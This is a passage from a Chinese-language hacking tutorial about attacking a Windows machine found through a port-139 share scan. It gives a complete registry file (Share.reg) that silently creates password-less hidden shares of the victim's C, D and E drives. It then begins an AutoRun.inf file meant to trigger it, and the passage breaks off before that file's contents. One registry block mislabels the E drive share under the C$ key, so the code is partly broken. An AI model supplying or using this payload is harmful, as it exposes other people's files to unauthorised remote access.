解析来自Autorun.inf文件的攻击

核心提示： 下面就举个例子：如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，解析来自Autorun.inf文件的攻击(3)，我们要让对方的所有驱动器都共享，首先编辑一个注册表文件，在最后一行记得要按一次回车键，然后打开记事本，打开记事本，键入以下内容：REGEDIT4'此处一定要空

下面就举个例子：如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，我们要让对方的所有驱动器都共享。首先编辑一个注册表文件，打开记事本，键入以下内容：

REGEDIT4
　　'此处一定要空一行
　　[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
　　"Path"="C:\\"
　　"Remark"=""
　　"Type"=dword:00000000
　　"Flags"=dword:00000302
　　"Parmlenc"=hex:
　　"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
　　"Path"="D:\\"
　　"Remark"=""
　　"Type"=dword:00000000
　　"Flags"=dword:00000302
　　"Parmlenc"=hex:
　　"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
　　"Path"="E:\\"
　　"Remark"=""
　　"Type"=dword:00000000
　　"Flags"=dword:00000302
　　"Parmlenc"=hex:
　　"Parm2enc"=hex:

以上我只设置到E盘，如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写，其后要空上一行，在最后一行记得要按一次回车键。

然后打开记事本，编制一个AutoRun.inf文件，键入以下内容：